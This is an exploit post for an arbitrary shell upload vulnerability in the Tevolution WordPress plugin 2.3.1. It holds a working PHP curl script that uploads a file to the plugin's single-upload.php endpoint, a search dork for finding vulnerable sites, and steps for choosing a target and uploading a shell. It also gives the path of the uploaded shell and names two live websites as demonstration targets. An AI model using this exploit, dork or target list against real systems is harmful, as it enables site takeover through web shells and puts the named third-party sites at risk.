######################
# Exploit Title : Wordpress Tevolution Plugin 2.3.1 Arbitrary Shell Upload Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:/wp-content/plugins/Tevolution/tmplconnector
# Vendor Homepage : https://templatic.com/
# version : 2.3.1
# Tested on: [ BackBox ]
# skype:xbadgirl21
# Date: 15/08/2016
# video Proof : https://youtu.be/eVjW6rnaoSY
######################
# [+] DESCRIPTION :
######################
# [+] The Tevolution WordPress plugin enables advanced functionality in our themes.
# [+] Some of the features it enables include custom post types, monetization options, custom fields…
# [+] An arbitrary shell upload web vulnerability has been detected in the Tevolution Plugin 2.3.1 and below.
# [+] The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory
######################
# [+] USAGE :
######################
# 1.- Download or Copy the Exploit C0des
# 2.- Use Dork and Choose One Of the Website
# 3.- Edit The Script
# 4.- Upload Your File : shell.php.jpg or shell.php.txt
######################
# [+] Exploit:
######################
<?php
$uploadfile="x21.PhP.Txt"; ///xBADGIRL21 ! Removing my name Doesn't mean you are the Founder or Owner of this ^_^
$ch = curl_init("http://127.0.0.1/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
######################
# [+] Dev!l Path :
######################
# http(s)://<wp-host>/<wp-path>/wp-content/themes/Directory/images/tmp/your-file-name.php.txt
######################
# [+] Live Demo :
######################
# http://guiagronicaragua.com
# http://eventsinsuriname.com
######################
# Discovered by : xBADGIRL21 - Unkn0wN
# Greetz : All Mauritanien Hackers - NoWhere
#######################
### Note ### : This Exploit Been Discovered By Someone iKnow but he Don't Want me to Write His Name
# so I Just Write the Exploit C0des ...........
#######################